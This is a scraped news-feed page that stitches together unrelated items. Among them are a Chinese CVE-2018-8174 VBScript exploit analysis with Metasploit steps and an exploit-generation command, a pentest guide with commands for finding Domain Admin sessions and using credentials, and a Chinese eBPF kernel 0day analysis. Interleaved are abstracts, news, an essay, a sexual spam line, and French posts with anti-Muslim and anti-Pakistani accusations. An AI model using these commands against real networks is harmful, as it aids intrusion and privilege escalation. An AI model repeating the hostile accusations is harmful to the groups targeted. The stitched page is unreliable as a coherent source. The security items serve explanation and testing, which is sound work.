漏洞简介 VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后攻击者可以安装程序; 查看,更改或删除数据; 或创建具有完全用户权限的新帐户。 在基于Web的攻击情形中,攻击者能通过Internet Explorer利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。 2018年5月8日,微软发布了安全补丁,影响流行的大部分系统版本。 漏洞基本信息 漏洞ID CVE-2018-8174 漏洞名称 Microsoft VBScript引擎远程执行代码漏洞 漏洞类型 远程代码执行 威胁类型 UAF 影响系统版本 Windows 7 x86和x64版本、RT8.1、Server2008及R2/2012及R2/2016、8.1、10及服务器等版本 漏洞测试 系统环境 Win7 32 IE IE8 EXP https://www.exploit-db.com/exploits/44741/ 漏洞原理 由于样本混淆严重,部分代码见图1,这里采用简化POC进行分析,代码见图2。  图1 样本采用了严重混淆  图2 Crash Poc Crash Poc中定义两个数组array_a和array_b,并声明了一个类MyTest,且重载了析构函数Class_Terminate,UAF中创建MyTest的实例赋值给数组array_a(1),并通过Erase array_a清空array_a中的元素,在析构array_a中的元素的时候会触发脚本中Class_Terminate的调用,在Class_Terminate中增加了一个array_b(0)对MyTest实例的引用(MyTest实例引用计数+1),再通过array_a (1)= 1删除array_a (1) 对MyTest实例的引用(MyTest实例引用计数-1)来平衡引用计数,这时候MyTest实例会被释放,但是array_b(0)仍然保留了这个MyTest实例的引用,从而array_b(0)指向了被释放的MyTest实例的内存,最终在MyTestVuln中通过b(0) = 0访问未分配内存触发漏洞。 当我们启用了页堆的IE浏览器运行这个PoC时,我们可以观察到OLEAUT32!VariantClear函数会发生崩溃:调用被释放的内存时出现访问冲突(Access Violation)异常。 从堆信息中可以看到eax(0x14032fd0)在vbscript!VbsErase的调用栈中被释放了,vbscript!VbsErase即对应了脚本中的Erase,而eax正是被VBScriptClass::Release函数释放的VBScriptClass对象也就是脚本中的MyTest实例。VBScriptClass::Release的逻辑如下图:     VBScriptClass::Release中首先对VBScriptClass的引用计数-1(&VBScriptClass+0×4),如果引用计数=0则调用VBScriptClass::TerminateClass,调用VBScriptClass::TerminateClass时因为在脚本中重载了Class_Terminate函数,所以获得了一次脚本执行的机会,这里就可以在释放VBScriptClass的内存前将即将释放的VBScriptClass内存地址保存脚本控制的变量中(Set array_b(0)=array_a(1)),并通过array_a (1) = 1平衡引用计数,最终释放内存。 Set array_a(1) = New MyTest时,VBScriptClass引用计数为2。 Erase array_a 返回后,MyTest指向的内存已释放,但array_b(0)仍指向这块被释放的内存,形成了悬挂指针,见下图: 漏洞利用分析 UAF漏洞利用的关键是如何用这个悬挂指针来操作内存。该漏洞利用多次UAF来完成类型混淆,通过伪造精数组对象完成任意地址读写,最终通过构造对象后释放来获取代码执行,代码执行没有使用传统的ROP技术或GodMod技术,而是通过脚本布局Shellcode利用。 伪造数组达到任意写目的 通过UAF制造2个类的mem成员指向的偏移相差0x0c字节,通过对2个对象mem成员读的写操作伪造一个0x7fffffff大小的数组。 伪造的数组大致情况是:一维数组,元素有7fffffff个,每个元素占用1字节,元素内存地址为0。所以该数组可访问的内存空间为0×00000000到0x7ffffffff*1。因此通过该数组可以任意地址读写。但是在lIlIIl在存放的时候,存放的类型是string类型,故只需要将该数据类型将会被修改为0x200C,即VT_VARIANT|VT_ARRAY,数组类型,即可达到目的。 攻击代码中,主要使用上面的函数来读取参数所指定的内存地址的数据。利用思路是在VBS中数据类型为bstr类型,通过vb中lenb(bstrxx)返回字符串地址前4个字节的内容(即bstr类型size域内容)的特性,获取指定内存读能力。 如上述代码所示,假如传进来的参数为addr(0×11223344),首先该数值加4,为0×11223348,然后设置variant类型为8(string类型)。然后调用len函数,发现是BSTR类型,vbscript会认为其向前4字节即0×11223344就是存放长度的地址内存。因此执行len函数,实际上就返回了制定参数内存地址的值。 通过DOSmodeSearch获取。 通过泄露CScriptEntryPoint对象的虚函数表地址,该地址属于Vbscript.dll。 由于vbscript.dll导入了msvcrt.dll,因此通过遍历vbscript.dll导入表获取msvcrt.dll基地址, msvcrt.dll又引入了kernelbase.dll、ntdll.dll,最后可以获取NtContinue、VirtualProtect函数地址。 绕过DEP执行shellcode a.利用任意读写的手段修改某个VAR的type类型为0x4d,再赋值为0让虚拟机执行VAR::Clear函数,如下图显示。 b.通过精心控制使代码执行ntdll!ZwContinue函数,第一次参数CONTEXT结构体也是攻击者精心构造的,见下图。 c.ZwContinue的第一个参数是指向CONTEXT结构体的指针,可计算出EIP和ESP在CONTEXT中的偏移。 d.实际运行时CONTEXT中的Eip和Esp的值以及攻击者的方法,见下图。  攻击者将CONTEXT中的EIP设置为VirutalProtect,将ESP中的返回地址和VirtualProtect的第一个参数,都设置为shellcode的起始地址。当ZwContinue执行后直接跳到VirtualProtect第一条指令开始执行。  根据攻击者构造的参数将shellcode所在内存设置为可执行状态,当VirtualProtect返回时就会跳到shellcode执行。 最后调用WinExec弹出计算器。 MSF利用 环境准备 目标机 Win7以及安装具有该漏洞的office 攻击机 Kali  linux Msf组件 https://github.com/Sch01ar/CVE-2018-8174_EXP 生成带有恶意 VBscript 的html 页面和 word 文档 python CVE-2018-8174.py -uhttp://192.168.106.139/exploit.html […]
          HK-Based Tech Startup Presslogic Raises $10m USD Series A+ Funding      Cache   Translate Page      
The round was closed by Meitu, Inc. (SEHK:1357), China’s leading image processing and social sharing platform Funds will be used to expand overseas female lifestyle content and user-generated content (UGC) markets, optimize its self-developed data-driven analytics software, as well as to exploit the e-commerce sector harnessing its own precise traffic and data   HONG KONG, […]
          Superpixel Guided Deep-Sparse-Representation Learning for Hyperspectral Image Classification      Cache   Translate Page      
This paper presents a new technique for hyperspectral image (HSI) classification by using superpixel guided deep-sparse-representation learning. The proposed technique constructs a hierarchical architecture by exploiting the sparse coding to learn the HSI representation. Specifically, a multiple-layer architecture using different superpixel maps is designed, where each superpixel map is generated by downsampling the superpixels gradually along with enlarged spatial regions for labeled samples. In each layer, sparse representation of pixels within every spatial region is computed to construct a histogram via the sum-pooling with $l_{1}$ normalization. Finally, the representations (features) learned from the multiple-layer network are aggregated and trained by a support vector machine classifier. The proposed technique has been evaluated over three public HSI data sets, including the Indian Pines image set, the Salinas image set, and the University of Pavia image set. Experiments show superior performance compared with the state-of-the-art methods.
          Fast and Resource-Efficient Hardware Implementation of Modified Line Segment Detector      Cache   Translate Page      
Lines are significant features enclosing high-level information in an image. The line segment Detector (LSD) Algorithm with low error rate is a widely used method to extract lines in images effectively and accurately. However, the algorithm on PC performs too costly both in time and resources for the real-time video processing. This paper provides a fast and resource-efficient hardware implementation solution for a modified LSD algorithm on Field Programmable Gate Arrays (FPGA) for real-time line detection. The task-level pipeline structures are exploited fully in a stream process mapped to the hardware architecture free of frame buffer. Our proposed hardware implementation processes in a stream-in–stream-out manner with little consumption of the on-chip block RAM to store intermediate values. We first employ hardware Gaussian filter and adjust Canny edge detection to obtain an edge map at single-pixel width. Then, a novel structure of region growing model based on dynamic rooted tree is used to detect line segment regions accurately with a latency of only a few rows of pixels. The low cost in time, on-chip resources, and power consumption makes our proposed algorithm suitable for portable real-time streaming video processing applications using line segment features, such as Lane departure warning systems. It can also be applied in real-time machine vision systems that use line segments information for further recognition or stereo correspondence and many others. The proposed algorithm is synthesized and tested on XC7Z020 FPGA with high reliability, accuracy speed, and low cost in both resources and energy.
          Sciences aquatiques/Biologiste chargé de l’évaluation des stocks III - Gouvernement du Canada - Whitehorse, YT      Cache   Translate Page      
Pêches et Océans Canada - Zone des rivières transfrontalières du Yukon (exploitation du fleuve Yukon et des rivières transfrontalières du Nord-Ouest de la...
From Government of Canada - Mon, 22 Oct 2018 23:05:44 GMT - View all Whitehorse, YT jobs
          Dell OpenManage Network Manager 6.2.0.51 SP3 Privilege Escalation      Cache   Translate Page      
Dell OpenManage Network Manager exposes a MySQL listener that can be accessed with default credentials. This MySQL service is running as the root user, so an attacker can exploit this configuration to, e.g., deploy a backdoor and escalate privileges into the root account.
          Degrowth as a concrete utopia      Cache   Translate Page      

Economic growth can’t reduce inequalities; it merely postpones confronting exploitation.

“My Visit to the Mountain Homestead.” Credit: Flickr/Eli Duke. CC BY 2.0.

The emergence of interest in degrowth can be traced back to the 1st International Degrowth Conference organized in Paris in 2008. At this conference, degrowth was defined as a “voluntary transition towards a just, participatory, and ecologically sustainable society,” so challenging the dogma of economic growth. Another five international conferences were organized between 2010 and 2018, with the latest in Malmo in August.

This year also saw the publication of Giorgos Kallis’ landmark book Degrowth, which opens with three bold statements. First, the global economy should slow down to avert the destruction of Earth’s life support systems, because a higher rate of production and consumption will run parallel to higher rates of damage to the environment. Hence, we should extract, produce and consume less, and we should do it all differently. Since growth-based economies collapse without growth we have to establish a radically different economic system and way of living in order to prosper in the future.

Second, economic growth is no longer desirable. An increasing share of GDP growth is devoted to ‘defensive expenditure,’ meaning the costs people face as a result of environmental externalities such as pollution. Hence, growth (at least in rich countries) has become “un-economic:” its benefits no longer exceed its costs.

Third, growth is always based on exploitation, because it is driven by investment that, in turn, depends on surplus. If capitalists or governments paid for the real value of work then they would have no surplus and there would be no growth. Hence, growth cannot reduce inequalities; it merely postpones confronting exploitation. 

The growth paradigm.

Economic growth implies the acceleration of the production of goods and services.  But it is not only GDP that has grown exponentially in the twentieth century: all indicators of work, environmental impact and ‘social metabolism’ have also accelerated (the processes of energy and material transformation in a society that are necessary for its continued existence), because GDP growth involves an increase in work and investment, the extraction of resources, and the disposal of waste.

However growth isn’t only a material process; it’s also cultural, political and social. After first appearing in colonial and industrial centres in the eighteenth and nineteenth centuries, it entrenched itself as a global ideology in the 1950s. Kallis calls this ideology “the growth paradigm:” the idea that perpetual economic growth is natural, necessary and desirable. This paradigm became the central concept of the geopolitical world order at a confluence of historical forces: the Cold War and the arms race, the end of colonialism and its indirect continuation under the guise of ‘development,’ and the failure of socialist projects for equality.

Even though growth is the child of capitalism, the pursuit of growth survived the abolition of capitalist relations in socialist countries. It is now easier to imagine the end of capitalism than the end of growth. Kallis argues that “every crisis leaves the idea of growth strengthened: the time when growth falters and seems to be coming to an end, when the costs of growth come to the forefront, is also when it becomes most necessary and is most ardently pursued, since without growth the system collapses.” The problem, however, is that economic growth is both increasingly harder to come by and is causing a planetary ecological breakdown.

Exiting the economy.

Degrowth evolved as much as a critique of the limits and costs of growth as a critique of economic reasoning. The problem isn’t only that economic growth is socially undesirable and environmentally unsustainable; it’s that the way economists frame reality is wrong. Kallis calls for “exiting the economy,” meaning de-centering the economy as a unit of analysis and a focus of political action. To do this it is necessary to mobilize different forms of knowledge and representations of reality.

Drawing from the work of Karl Polanyi, Kallis develops a critique of “economism:” the expansion under capitalism of the logic of commodity and market exchange to realms of life from which they were previously excluded. Indeed, what we today understand as ‘economic’ activities were once embedded in social institutions in pre-capitalist societies like rituals, kinship networks, and state or religious mechanisms of redistribution. Market activities were subordinate to politics and values.

Therefore the economy “is the instituted process of interactions between humans and their environments, involving the use of material means for the satisfaction of human values.” Societies develop institutions within which economic activities are embedded, so these institutions aren’t neutral; rather they order conflicting values and interests and are themselves a domain of power and struggle.

The economy is also part of the ‘social imaginary’ - how we organize our world based on certain foundational ideas that express what we think it should look like. Imaginaries rest on a system of symbols, “significations” and institutions like GDP and central banks. Kallis explains that “an imaginary provides a culture with the meaning that drives its actions. The imaginary of a market economy is imprinted in the institutions of a market economy, which in turn produce subjects who behave like the rational maximizers of market economics. Market economics is then validated by a world that it has helped create.”

But when a tension between these imaginaries and actual experience emerges, change becomes more likely through a process that is rife with conflicts, since the pursuit of new imaginaries is never shared by the whole of society. Those who hold power have an interest in things staying as they are, while the rest strive to unleash the social potential that can change the world.

In the case of degrowth the new imaginaries that we need revolve around the idea that there will never be enough until we share what there is; sharing and enjoying a limited planet is what degrowth is all about.

A concrete utopia.

Degrowth refers to a path where throughput, and in all likelihood output, shrinks while living conditions improve. Kallis frames this as a hypothesis: “subject to a radical and egalitarian social transformation, it is possible to sustain well-being and improve living and ecological conditions in an economy that unavoidably will contract. Seen as a research programme, the agenda is to find how, or under what conditions, this may become possible.”

Such a transformation is meant to re-embed the economy within society. And securing conditions that enable everyone to have enough will ensure that nobody faces scarcity - even if society produces less than today - by providing all the basic goods essential for human wellbeing free from payment.

Revisioning productivity is also important: taking resources and time out of the production circuit and devoting them instead to politics and leisure, or to spending time with family and friends. Unlike today, productivity would not be the final objective of public policies. Even if we are less productive, relational ‘goods’ increase and compensate for the loss of material goods. Furthermore, in degrowth, unpaid care work would be valued, and cooperatives or not-for-profits would become the dominant producers, employing most of the working population. As a consequence, the realm of production for profit would be radically reduced, and opportunities for accumulation – that is, investment for expansion and further profit – would be curtailed.

Even though the contraction of the economy is not the goal, in the long run this is inevitable. And it will happen either as a broader political project of social transformation (i.e. degrowth) or catastrophically through a series of crises. Kallis calls this project a “concrete utopia,” since there are concrete steps that can to help bring it closer.

To this end he discusses policy proposals including the replacement of GDP; a reduction in working hours to create employment in the absence of growth; a universal income or a guaranteed bundle of public services to ensure that everyone has enough to get by without depending on money; redistributive taxation to increase equality and the establishment of a maximum income to arrest competition for positional consumption; a redirection of public investments from the private sector to the public, and from infrastructure and activities that increase productivity to expenditures that green the economy and reclaim the commons; and the adoption of environmental caps.

It is worth noting that some of these policy proposals were included in a recent open letter signed by 238 scientists who called on the European Union to plan for a post-growth future in which human and ecological well-being is prioritised. Kallis concludes his book by arguing that, even though such policies may appear reformist compared with the utopian vision of degrowth, they are extremely radical when compared to where things currently stand. Borrowing the term ‘non-reformist reforms’ from André Gorz, he explains that if such reforms were to be implemented they “would require the very contours of the system to change radically to accommodate them. And simple and commonsensical as they are, they expose the irrationality of a system that makes them seem impossible and yet deems possible what in all likelihood will end in catastrophe.”

Sideboxes
Rights: 
CC by 4.0

          Waikato company and director to pay $37,500 for employment b      Cache   Translate Page      
Press Release – Ministry of Business Innovation and Employment A Waikato company has been ordered to pay $25,000, and similarly its sole director has been ordered to pay $12,500 by the Employment Relations Authority (ERA) for exploiting six staff underpaid by more than $17,300.Media release 7 November 2018 Waikato company and director to pay $37,500 […]
          Watch Chuck Yeager talk in depth about breaking the sound barrier, almost getting killed ejecting from an NF-104, and other exploits from his incredible aviation career in this 95 minute interview from 1991. Sometimes old news really is exciting [Cool]      Cache   Translate Page      
Cool [link] [17 comments]

          The Black Klansman (1966)      Cache   Translate Page      

Spike Lee’s BLACKkKLANSMAN is out on video today. Back when I saw it in the theater it made me curious about the 1966 movie of the almost same title. THE BLACK KLANSMAN was also released as I CROSSED THE COLOR LINE, and it’s from exploitation director/mustache aficionado Ted V. Mikels (THE ASTRO-ZOMBIES, THE CORPSE GRINDERS, […]

The post The Black Klansman (1966) appeared first on Vern's Reviews on the Films of Cinema.


          Morocco- French Pompidou Center Suspends Presentation Pro-Polisario Book      Cache   Translate Page      
(MENAFN - Morocco World News) #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000">'We found a form of political exploitation of [what we think was] only a mere presentation of a document,' the center was quoted by as saying. The ...
                Cache   Translate Page      
ED Confirms Oil, Gas Discovery
02 NOV, 2018 - 00:11
Tendai Mugabe Senior Reporter
Zimbabwe Herald

President Mnangagwa yesterday officially announced the discovery of oil and gas in the greater Muzarabani area by Australian Stock Exchange-listed company Invictus Energy stretching over 200km.

The size of the land makes the discovery the largest undrilled gas deposits in Africa so far.

The announcement comes as exciting news for Zimbabweans who are experiencing fuel shortages.

Addressing journalists at his Munhumutapa Offices in Harare yesterday, the President said if all goes according to plan, Zimbabwe would have its first oil exploration well by 2020.

“The Government of Zimbabwe has over the last few months worked with and facilitated Invictus Energy Limited which is quoted on the Australian Stock Exchange to undertake oil and gas exploration studies in Muzarabani,” said President Mnangagwa.

“Invictus is utilising data which was generated by Mobil Oil in the 1990s when extensive oil and gas geo-physical work was undertaken in the greater Muzarabani area. As part of its exploration studies, Invictus has engaged a number of worldwide professional companies with extensive experience in oil and gas.

“We have since been advised by Invictus that the findings are positive and point to oil and gas deposits in the area. Government of Zimbabwe will work very closely with Invictus to ensure that Invictus realises its plans to sink an exploration well by mid-2020. After the exploration well, the next stage will be commercial exploitation of the resource. In the interim, additional geo-physical work is ongoing to identity further exploration targets.

“Updates will be given as and when the planned exploration work results come in.

“The result, as communicated by Invictus, is an exciting development for our country. Invictus has committed itself to enter a production sharing agreement with the Government of Zimbabwe which will be applicable when the project proceeds to commercial production stage.”

Mines and Mining Development Minister Winston Chitando gave a detailed technical report relating to the project.

“Most of us recall that Mobil did extensive work in the 1990s and the work they did is stored in magnetic tapes which are in the custody of the Ministry of Mines. As outlined by His Excellency, the Government of Zimbabwe has over the last few months been working with Invictus for the re-interpretation of the work which was done by Mobil. Mobil did a lot of geo-physical work which includes aero-magnetic surveys in the greater Muzarabani area,” said Minister Chitando.

“It is important to highlight that Invictus has managed to progress much more than Mobil did for two reasons. Firstly, recent discoveries of oil and gas in Kenya and Uganda notably, which are of similar geological set-up, have increased the knowledge base of extraction of oil and gas. Secondly, more modern techniques have evolved over the last few years on analysing gas and oil prospects. The resource in Muzarabani consists of both gas and oil.”

Minister Chitando continued: “On exploitation the oil would be refined into fuel and generally to produce both diesel and gas. The gas can be used for one or more of the following, it can be piped to end users, or it can be used for power generation and for conversion into fuel. The Muzarabani target is about 200km which makes it the largest undrilled onshore resource in Africa. Apart from the geo-physical work carried out to date, the Muzarabani basin has never been drilled before. All work has been limited to geo-physical work.

“The next stage is to drill an exploration well at a cost of about US$20 million. The hole will be about 300 milli-metres in diameter and probably about four and half kilometres deep. The rig will have to be imported or maybe relocated from some countries in Africa who are doing similar projects. The actual drilling will not take long. It is estimated that within 60 days drilling will be achieved. However, most of the work is in pre-planning of the drilling and additional geo-physical.

“The exact location of the well will depend on the work done to date and work to be done over the next few months. The details of the resource will be made available in the public domain by early tomorrow morning. The resource estimates as outlined by the President have been confirmed by an international consultancy in the oil industry.”

          Cheating wife is catfished and exploited into sex (6:00)      Cache   Translate Page      
Cheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sexCheating wife is catfished and exploited into sex
          Que signifient étymologiquement « islam » et « musulman » ? Rien à voir avec la paix…      Cache   Translate Page      
L’islâm (en idiome coranique الإسلام) ne signifie pas « la paix ». Les locuteurs de langues européennes se font souvent abuser par des propagandistes islamiques du genre Tariq Ramadan et consorts qui – exploitant l’ignorance de leurs interlocuteurs dans cet idiome -, leur “vendent” le boniment de l’islam en tant que “religion de Paix”. Il est donc […]
          Qui a envie de manger Charlène Downes, transformée en Kebab ?      Cache   Translate Page      
Les dernières révélations concernant Charlène Downes, petite Anglaise disparue depuis 15 ans, vraisemblablement violée, tuée, découpée en morceaux et servie dans les kebabs où travaillaient ses ravisseurs nous laissent écoeurés, révoltés, désespérés. Cette petite jeune fille a fait partie du groupe de ces fillettes exploitées sexuellement par tout un groupe de Pakistanais avec la complicité […]
          Huge boost as Liverpool add highly-respected Brazilian journalist to South American scouting network      Cache   Translate Page      

Huge boost as Liverpool add highly-respected Brazilian journalist to South American scouting network - originally posted on Sportslens.com

Liverpool have appointed Brazilian journalist Dassler Marques as one of their scouts in South America. The revered journalist announced on Twitter that he has quit Brazilian news outlet Universo Online Esporte and journalism in order to exploit new things, and more importantly, join the Reds scouting network in his country and on the continent. Marques comes highly-recommended as he is an avid follower of Brazilian youth football and is extremely knowledgeable on Brazilian talents and potential. His appointment comes as a huge boost in terms of identifying hidden gems on the South American continent. Após aprendizados, sonhos e principalmente amigos

From Sportslens.com - Football News | Football Blog


          5 Ways to Find Systems Running Domain Admin Processes      Cache   Translate Page      

( Original text byScott Sutherland )

Introduction

Migrating to Domain Admin processes is a common way penetration testers are able to impersonate Domain Admin accounts on the network. However, before a pentester can do that, they need to know what systems those processes are running on. In this blog I’ll cover 5 techniques to help you do that. The techniques that will be covered include:

Checking Locally Querying Domain Controllers for Active Domain User Sessions Scanning Remote Systems for Running Tasks Scanning Remote Systems for NetBIOS Information PSExec Shell Spraying Remote Systems for Auth Tokens Obtaining Domain Admin Privileges

For the most part, this blog will focus on identifying systems that are running Domain Admin processes. However, for the sake of context, I’ve outlined the standard process many penetration testers use to obtain Domain Admin privileges.

Identify target systems and applications Identify potential vulnerabilities Exploit vulnerabilities to obtain initial access Escalate privileges on the compromised system Locate Domain Admin processes/authentication tokens locally or on Remote Systems Authenticate to a remote system running Domain Admin Processes by passing the local Administrator’s password hash, cracking passwords, or dumping passwords with a tool like mimikatz Migrate to a Domain Admin Process Create a Domain Admin

The process as a whole is well known in the penetration testing community, and you should be able to find plenty of blogs, white papers, and video tutorials via Google if you’re interested in more details. Moving forward, I will only be focusing on options for number 5.

Finding Domain Admin Processes

Ok, enough of my ramblings. As promised, below are 5 techniques for finding Domain Admin processes on the network.

Technique 1: Checking Locally

Always check the initially compromised system first. There’s really no point is running around the network looking for Domain Admin processes if you already have one. Below is a simple way to check if any Domain Admin processes are running using native commands:

Run the following command to get a list of domain admins: net group “Domain Admins” /domain Run the following command to list processes and process owners. The account running the process should be in the 7th column. Tasklist /v Cross reference the task list with the Domain Admin list to see if you have a winner.

It would be nice if Domain Admin processes were always available on the system initially compromised, but sometimes that is not the case. So the next four techniques will help you find Domain Admin process on remote domain systems.

Technique 2: Querying Domain Controllers for Active Domain User Sessions

To my knowledge this technique is a NetSPI original. We wanted a way to identify active Domain Admin processes and logins without having to spray shells all over the network or do any scanning that would set off IDS. Eventually it occurred to us to simply query the domain controllers for a list of active domain user sessions and cross reference it with the Domain Admin list. The only catch is you have to query all of the domain controllers. Below I’ve provided the basic steps to get list of systems with active Domain Admin sessions as a domain user:

Gather a list of Domain Controllers from the “Domain Controllers” OU using LDAP queries or net commands. I’ve provided a net command example below. net group “Domain Controllers” /domain Important Note:

The OU is the best source of truth for a list of domain controllers, but keep in mind that you should really go through the process of enumerating trusted domains and targeting those domain controllers as well.

Alternatively, you can look them up via DNS.

Nslookup type=SRV _ldap._tcp.

Gather a list of Domain Admins from the “Domain Admins” group using LDAP queries or net commands. I’ve provided a net command example below. net group “Domain Admins” /domain Gather a list of all of the active domain sessions by querying each of the domain controllers using Netsess.exe. Netsess is a great tool from Joe Richards that wraps around the native windows function “netsessionenum”. It will return the IP Address of the active session, the domain account, the session start time, and the idle time. Below is a command example. Netsess.exe h Cross reference the Domain Admin list with the active session list to determine which IP addresses have active domain tokens on them. In more secure environments you may have to wait for a Domain Admin or Service account with Domain Admin privileges to take actions on the network. What that really means I you’ll have to run through the process multiple time, or script it out. Below is a very quick and dirty Windows command line script that uses netsess. Keep in mind that dcs.txt has a list of domain controllers and admins.txt has a list of Domain Admins. FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt &&
FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a

I wrote a basic batch script named Get Domain Admins (GDA) which can be download that automates the whole process. The dependencies are listed in the readme file. I would like to give a shout out to Mark Beard and Ivan Dasilva for helping me out on it. I’ve also created a batch file called Get Domain Users (GDU) for Windows Dictionary attacks which has similar options, but more dependencies. If you interested it can be downloaded by clicking the link above.

Technique 3: Scanning Remote Systems for Running Tasks

I typically have success with the first two options. However, I came across this method in a pauldotcom blog by LaNMSteR53 and I thought it was a clever alternative. Once you are running as the shared local administrator account on a domain system you can run the script below to scan systems for Domain Admin Tasks. Similar to the last technique you will need to enumerate the Domain Admins first. In the script below ips.txt contains a list of the target systems and the names.txt contains a list of the Domain Admins.

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

The original post is: Crawling for Domain Admin with Tasklist if you’re interested.

Technique 4: Scanning Remote Systems for NetBIOS Information

Some Windows systems still allow users to query for logged in users via the NetBIOS queries. The information can be queried using the native nbtstat tool. The user name is indicated by “<03>” in the nbtstat results.

Below is another quick and dirty Windows command
          Kubernetes : VMware consolide sa transition cloud avec l’acquisition d’Helio      Cache   Translate Page      
VMware annonce l’acquisition d’Helio afin d’aiider les entreprises à construire et à exploiter des architectures conteneurisées basées sur Kubernetes.
          四两拨千斤:Ubuntu kernel eBPF 0day分析      Cache   Translate Page      

中国武术博大精深,其中太极作为不以拙力胜人的功夫备受推崇。同样如果从攻击的角度窥视漏洞领域,也不难看出攻防之间的博弈不乏“太极”的身影,轻巧稳定易利用的漏洞与工具往往更吸引黑客,今天笔者要着墨分析的就是这样一个擅长“四两拨千斤”的0day漏洞。

0day漏洞的攻击威力想必大家都听说过,内核0day更因为其影响范围广,修复周期长而备受攻击者的青睐。近期,国外安全研究者Vitaly Nikolenko在twitter[1]上公布了一个Ubuntu 16.04的内核0day利用代码[2],攻击者可以无门槛的直接利用该代码拿到Ubuntu的最高权限(root);虽然只影响特定版本,但鉴于Ubuntu在全球拥有大量用户,尤其是公有云用户,所以该漏洞对企业和个人用户还是有不小的风险。

笔者对该漏洞进行了技术分析,不管从漏洞原因还是利用技术看,都相当有代表性,是Data-Oriented Attacks在linux内核上的一个典型应用。仅利用传入的精心构造的数据即可控制程序流程,达到攻击目的,完全绕过现有的一些内存防护措施,有着“四两拨千斤”的效果 。

0×02 漏洞原因

这个漏洞存在于Linux内核的eBPF模块,我们先来简单了解下eBPF。

eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,严格来说,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,tracfic control,应用性能监控等强大功能。为了实现如此强大的功能,eBPF提供了一套类RISC指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。

看到这里,有经验的安全研究者可能会想到,能向内核提交可控的指令代码去执行,很可能会带来安全问题。事实也确实如此,历史上BPF存在大量漏洞 [3]。关于eBPF的更多细节,可以参考这里[4][5]。

eBPF在设计时当然也考虑了安全问题,它在内核中实现了一套verifier机制,过滤不合规的eBPF代码。然而这次的漏洞就出在eBPF的verifier机制。

从最初Vitaly Nikolenko公布的补丁截图,我们初步判断该漏洞很有可能和CVE-2017-16995是同一个漏洞洞[6],但随后有2个疑问: 1.CVE-2017-16995在去年12月份,内核4.9和4.14及后续版本已经修复,为何Ubuntu使用的4.4版本没有修复? 2.CVE-2017-16995是Google Project Zero团队的Jann Horn发现的eBPF漏洞,存在于内核4.9和4.14版本[7],作者在漏洞报告中对漏洞原因只有简短的描述,跟本次的漏洞是否完全相同? 注:笔者所有的代码分析及调试均基于Ubuntu 14.04,内核版本为4.4.0-31-generic #50~14.04.1-Ubuntu[8]。

先来回答第二个问题,中间的调试分析过程在此不表。

参考以下代码,eBPF的verifer代码(kernel/bpf/verifier.c)中会对ALU指令进行检查(check_alu_op),该段代码最后一个else分支检查的指令是:

1.BPF_ALU64|BPF_MOV|BPF_K,把64位立即数赋值给目的寄存器; 2.BPF_ALU|BPF_MOV|BPF_K,把32位立即数赋值给目的寄存器;

但这里并没有对2条指令进行区分,直接把用户指令中的立即数insn->imm赋值给了目的寄存器,insn->imm和目的寄存器的类型是integer,这个操作会有什么影响呢?


四两拨千斤:Ubuntu kernel eBPF 0day分析
我们再来看下,eBPF运行时代码(kernel/bpf/core.c),对这2条指令的解释是怎样的(bpf_prog_run)。 参考以下代码,上面2条ALU指令分别对应ALU_MOV_K和ALU64_MOV_K,可以看出verifier和eBPF运行时代码对于2条指令的语义解释并不一样,DST是64bit寄存器,因此ALU_MOV_K得到的是一个32bit unsigned integer,而ALU64_MOV_K会对imm进行sign extension,得到一个signed 64bit integer。
四两拨千斤:Ubuntu kernel eBPF 0day分析
至此,我们大概知道漏洞的原因,这个逻辑与CVE-2017-16995基本一致,虽然代码细节上有些不同(内核4.9和4.14对verifier进行了较大调整)。但这里的语义不一致又会造成什么影响? 我们再来看下vefier中以下代码(check_cond_jmp_op),这段代码是对BPF_JMP|BPF_JNE|BPF_IMM指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(insn->imm),程序继续执行,否则执行pc+off处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论imm是否有符号,在这里都是相等的。
四两拨千斤:Ubuntu kernel eBPF 0day分析
再看下eBPF运行时对BPF_JMP|BPF_JNE|BPF_IMM指令的解释(bpf_prog_run),显然当imm为有符合和无符号时,因为sign extension,DST!=IMM结果是不一样的。
四两拨千斤:Ubuntu kernel eBPF 0day分析
注意这是条跳转指令,这里的语义不一致后果就比较直观了,相当于我们可以通过ALU指令的立即数,控制跳转指令的逻辑。这个想象空间就比较大了,也是后面漏洞利用的基础,比如可以控制eBPF程序完全绕过verifier机制的检查,直接在运行时执行恶意代码。

值得一提的是,虽然这个漏洞的原因和CVE-2017-16995基本一样,但但控制跳转指令的思路和CVE-2017-16995中Jann Horn给的POC思路并不一样。感兴趣的读者可以分析下,CVE-2017-16995中POC,因为ALU sign extension的缺陷,导致eBPF中对指针的操作会计算不正确,从而绕过verifier的指针检查,最终读写任意kernel内存。但这种利用方法,在4.4的内核中是行不通的,因为4.4内核的eBPF不允许对指针类型进行ALU运算。

